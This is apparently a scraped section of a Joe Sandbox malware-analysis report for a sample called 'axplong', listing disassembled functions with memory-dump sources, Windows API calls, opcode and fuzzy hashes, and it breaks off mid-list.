Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 765cca662e8b273d6a88c93f6adb1afc046606b459cbba313defa624c69ca2c0
Instruction ID: 743bc609518413339f7d45fa711dbc66ffea430522c54c2515272b8285dca371
Opcode Fuzzy Hash: 765cca662e8b273d6a88c93f6adb1afc046606b459cbba313defa624c69ca2c0
Instruction Fuzzy Hash: FE111FB291020DAEDB14DED4D984EDFB7BCAF09310F514266E556E7180EB30EB58CB62

Function 0024AF0B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,58BE858D,?,?,0022D32C,58BE858D,?,002278FB,?,?,?,?,?,?,00217435,?), ref: 0024AF3D

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b8ac38f04d97f05503f1831dd4a2ad424ced39308b14cc9beb60bfe3ff2c459b
Instruction ID: 5149a3d07c1aa174a5fd29a0f6015e30349627de4f1cdba24c37e7d4a309dd7a
Opcode Fuzzy Hash: b8ac38f04d97f05503f1831dd4a2ad424ced39308b14cc9beb60bfe3ff2c459b
Instruction Fuzzy Hash: 4BE02B626FA11356EB293A65AC40B5B36889F913B1F170161AC1496CD1CFA7CC244AE3

Function 0027F0A5 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 0027FA2D

Memory Dump Source

Source File: 00000009.00000001.1964387878.000000000027B000.00000040.00000001.01000000.00000007.sdmp, Offset: 0027B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_27b000_axplong.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: af42b497488eda406c672d1d14dc100d176e10d3b3e06391c1e4b4d39689ace8
Instruction ID: c7bf4eb2476eca1b045b2a570848e031cf34ea3319ae607a08aa44214c716c75
Opcode Fuzzy Hash: af42b497488eda406c672d1d14dc100d176e10d3b3e06391c1e4b4d39689ace8
Instruction Fuzzy Hash: 000169B612C308AFE3427F29D94526EBBE0EF94704F02483DDAC583381FA715861DA4B

Function 0027EF62 Relevance: 1.3, APIs: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 0027F02A

Memory Dump Source

Source File: 00000009.00000001.1964387878.000000000027B000.00000040.00000001.01000000.00000007.sdmp, Offset: 0027B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_27b000_axplong.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 854687854149b477865d19b13189e56238406ed497f19e8c55ada93f395f82f5
Instruction ID: 342bd7acd2e99345e64218a857ca389197e12d399a1e5a65eba76fc86f312568
Opcode Fuzzy Hash: 854687854149b477865d19b13189e56238406ed497f19e8c55ada93f395f82f5
Instruction Fuzzy Hash: CDF0347152C605CFDB412F24CA4467EBBB0EF01321F114A29E99A8B290DBB54CB0DF0A

Function 04E50C46 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc8db6c25c0cac0876f5f3a5d08f4bdc2ce679e668f31f8b6a9e759646bff57
Instruction ID: 6e4f65a4e339077559b7c401a63b5110d43eed6449d6be2904bb97ed896c8757
Opcode Fuzzy Hash: ffc8db6c25c0cac0876f5f3a5d08f4bdc2ce679e668f31f8b6a9e759646bff57
Instruction Fuzzy Hash: CA11A1F720E211AEF282C6556B50AF737B9EBD333073098A6FC42C6151F2956D497131

Function 04E50C41 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a46981187651937728652536a45d2bc50e4c382a49d3d034805d3d5c9ff08f
Instruction ID: 57f2c6f93110ea09078a39847d292ae5c63827b47a69aa9fa0bb88a3fbbbe99d
Opcode Fuzzy Hash: 07a46981187651937728652536a45d2bc50e4c382a49d3d034805d3d5c9ff08f
Instruction Fuzzy Hash: 330128F720E120ADF14181466B50AF627ADE7D3730730A8A6FC46C2251F2952E497132

Function 04E50C67 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d613bd9251adb7c58e7d71b3b180a6ae89b8ae36925d3c4cf0dcf58d409ae9ff
Instruction ID: f5061b0dbc062e9cf87374da35596e09f863bc33397a4aebdd935724be7766dc
Opcode Fuzzy Hash: d613bd9251adb7c58e7d71b3b180a6ae89b8ae36925d3c4cf0dcf58d409ae9ff
Instruction Fuzzy Hash: 3AF04BF720E110ADF14181426B10AF727A9E7D373077098A7FC46C2251E2952D497632

Function 04E50C74 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bc2f949f87d26482cb2b0ed8743a68daa0836e15e6583f5ef9fe17dced8825
Instruction ID: e73f49a9e1e67352977225777e54234c9dd060001b780ab4e39cbc2296990b61
Opcode Fuzzy Hash: 03bc2f949f87d26482cb2b0ed8743a68daa0836e15e6583f5ef9fe17dced8825
Instruction Fuzzy Hash: 40F069F720E220BDB141C6466B10AF767BDE6D373033099A7F846C2252E2956E497632

Function 04E50C8D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60e3312c1af81a01a5be97f35186a7ef2561b25daf2d1ec792e3457d8a7cbf6
Instruction ID: dad0da2542c499e9b119bb83f1cf59d771851aa60b413e2fd23410fb63d40aeb
Opcode Fuzzy Hash: d60e3312c1af81a01a5be97f35186a7ef2561b25daf2d1ec792e3457d8a7cbf6
Instruction Fuzzy Hash: D0F0A4F730E250BEB141C6426B10AFB77BDE6C373033198A7F886D2146E2641D497232

Function 04E50CA7 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8bd6d905cf1a6d8cd028e2c5c1abbb3d1faa133486818e7c5086d849e9ba48
Instruction ID: d2e70da2729161a5f27d16395eca9132c2fcfac646440025c3ee0c3ecfdee732
Opcode Fuzzy Hash: 7d8bd6d905cf1a6d8cd028e2c5c1abbb3d1faa133486818e7c5086d849e9ba48
Instruction Fuzzy Hash: 41F0AFF720D2247EA141D1866B24AF667ADE6C7731331D867F802D7242F2955D487231

Function 04E50D1B Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae35b8e89253a09545a2a9df208d67b693b9f31d7445107632837d9d369cd5ec
Instruction ID: d3a78b4e521e64126b7004ba2b6a51f17ef17b4566a60cc99f6e8f106f9596b2
Opcode Fuzzy Hash: ae35b8e89253a09545a2a9df208d67b693b9f31d7445107632837d9d369cd5ec
Instruction Fuzzy Hash: 47F062F724E160ADA141C6826B10AF77BB9E6C37303719867F842C6542F2946D4D7631

Function 04E50CC7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2e52d4fc7eb67e1f351d9160006eaf027aa9b94a6912697c79f06953009b45
Instruction ID: 6a31a861c28672026bf6351d212034d8c9fe246b18ccf7ce57ac01e9fb55144c
Opcode Fuzzy Hash: 9b2e52d4fc7eb67e1f351d9160006eaf027aa9b94a6912697c79f06953009b45
Instruction Fuzzy Hash: F7F0F8FB20D224ADB14285423B14AFB6BADE5D27713318867F846D2146E299594DB232

Function 04E50CD9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6dc8ee1b2ed22f019bad994855ba38d8bfdd4b5288dcc0ec765a4ab978188a
Instruction ID: c1339f2c8257f78c6379dda7dc73694afe8d1bbce4c7f1591ba8e2eac39e3309
Opcode Fuzzy Hash: ae6dc8ee1b2ed22f019bad994855ba38d8bfdd4b5288dcc0ec765a4ab978188a
Instruction Fuzzy Hash: B5E065FB20D1606DB182814237246F66BA9D5D3771331C877F442C2146F1991E4D7232

Function 04E50D03 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3836439624.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e50000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ca9e8aee1abd92f980123556929d66d801a66e293e0e6cfe2974fd6c8b169d
Instruction ID: 14c640ae895f5fc67c946b9155d1f7970db4890e41f251d3f0e47e9a5995f4b4
Opcode Fuzzy Hash: e1ca9e8aee1abd92f980123556929d66d801a66e293e0e6cfe2974fd6c8b169d
Instruction Fuzzy Hash: 40D023E72091608F46CB04D363105753DA23BD323237100F27482431C6F4925C44F371

Non-executed Functions

Function 00253068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002531E3

Strings

1#IND, xrefs: 00254373
1#INF, xrefs: 0025439E
1#SNAN, xrefs: 0025437A
1#QNAN, xrefs: 00254381

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e7ee8f7db8af7f46d25ee83997a63f6629642ad887adabd88702a6d03dec2647
Instruction ID: 323a2d1662425c9e2b30da9ce717737195300bd731200cc5e86bee172bd20625
Opcode Fuzzy Hash: e7ee8f7db8af7f46d25ee83997a63f6629642ad887adabd88702a6d03dec2647
Instruction Fuzzy Hash: C0C27D71E246298FCB25CF28DD407E9B3B9EB48346F1451EAD80DE7240E774AE998F44

Function 00252BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: acce0c2ba80c9dcf69c824c7aa8788f06cab3b38016c4636417623e5aa6eb761
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 86F17071E1021ADFDF14CFA8D8806AEB7B1FF49315F158269D819AB384D730AE19CB94

Function 0022CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0022CE82,?,?,?,?,0022CEB7,?,?,?,?,?,?,0022C42D,?,00000001), ref: 0022CB33

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: f3b923a0c6f1c5c5ea6bcef6ff85f224285b94abbb5dee39d14e6e91b2137705
Instruction ID: 108f19ef692fc7b8be6bb665ef62690e040cff03fb53ed5b751b65caf57c2d59
Opcode Fuzzy Hash: f3b923a0c6f1c5c5ea6bcef6ff85f224285b94abbb5dee39d14e6e91b2137705
Instruction Fuzzy Hash: 48D0223252213CE3CE012BD1BC088AEBB0C8F00B183204112EC082B120CAD06C915BD0

Function 00247D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00247EFF

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 25a741716def20cd8ae4154c8cf5766ae9119c8d61fea51b136016b5a6c83033
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 0751BA3073C60A9ACB3D8E3888957BE679A9F12300F140669D472E7A82CB919D388751

Function 0027E872 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

NTDL, xrefs: 0027EA2D

Memory Dump Source

Source File: 00000009.00000001.1964387878.000000000027B000.00000040.00000001.01000000.00000007.sdmp, Offset: 0027B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_27b000_axplong.jbxd

Similarity

API ID:
String ID: NTDL
API String ID: 0-3662016964
Opcode ID: cb79351c64fefcefea09021f9bce2dcfcc99926527f17caf8fd0ba52988505bd
Instruction ID: c9e7ea9fd96e28402604d0a1dddcba994cfadd4a424224e75055e1ed0d6d911a
Opcode Fuzzy Hash: cb79351c64fefcefea09021f9bce2dcfcc99926527f17caf8fd0ba52988505bd
Instruction Fuzzy Hash: 3C71B67292421ECFDF15CF24C1106EF7BA0FF5A324F21856AD84687A41D2B24D31EBA9

Function 00214CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e01793a176a0a1c4bd20050699a88ca1bce4925a9edbbd42597d4bef77f7ef3c
Instruction ID: 2c6916c1371143929b8f5d5cf1c147103bab0505fa56a6ae944235497683f0e5
Opcode Fuzzy Hash: e01793a176a0a1c4bd20050699a88ca1bce4925a9edbbd42597d4bef77f7ef3c
Instruction Fuzzy Hash: 63225FB3F515144BDB4CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44

Function 00256F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f29fd649772435b63e58340873a7466f3f7d9fed498d548c8620de29165382
Instruction ID: 7495918fd109623582ea8df072bcc0716bc04c8d42003dae53a6937abb055717
Opcode Fuzzy Hash: f1f29fd649772435b63e58340873a7466f3f7d9fed498d548c8620de29165382
Instruction Fuzzy Hash: 63B18B31224609CFD714CF28D48AB657BE0FF45366F258658EC9ACF2A1C335E9A6CB44

Function 0027DDF9 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000001.1964387878.000000000027B000.00000040.00000001.01000000.00000007.sdmp, Offset: 0027B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_27b000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f15a0f674a70627d4fd680fcbd33da02fae7301f59be38beff33625208afa4
Instruction ID: b5c6646748e41f2fe89f9d9b9e60b592ad4abbce6fe758a441d3be8fdefcb228
Opcode Fuzzy Hash: 81f15a0f674a70627d4fd680fcbd33da02fae7301f59be38beff33625208afa4
Instruction Fuzzy Hash: 2C917DF7F516254BF3544879DC98362258397E4324F2F82788F98AB7C6E8BE5C0A5384

Function 002960BD Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000001.1964387878.000000000027B000.00000040.00000001.01000000.00000007.sdmp, Offset: 0027B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_27b000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de77f7bed21a497a8058cc4de422603265f0fd604fcfa7adb595e1990db2f76b
Instruction ID: 205e31afbfd883aa9c467fa59baa7dd8ef6083e24e252f8de713f3bd79389565
Opcode Fuzzy Hash: de77f7bed21a497a8058cc4de422603265f0fd604fcfa7adb595e1990db2f76b
Instruction Fuzzy Hash: 99716DB3F216254BF3444A78CC983627653DB99310F2F4278CE48AB7C5D97E6D0A9784

Function 00214AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
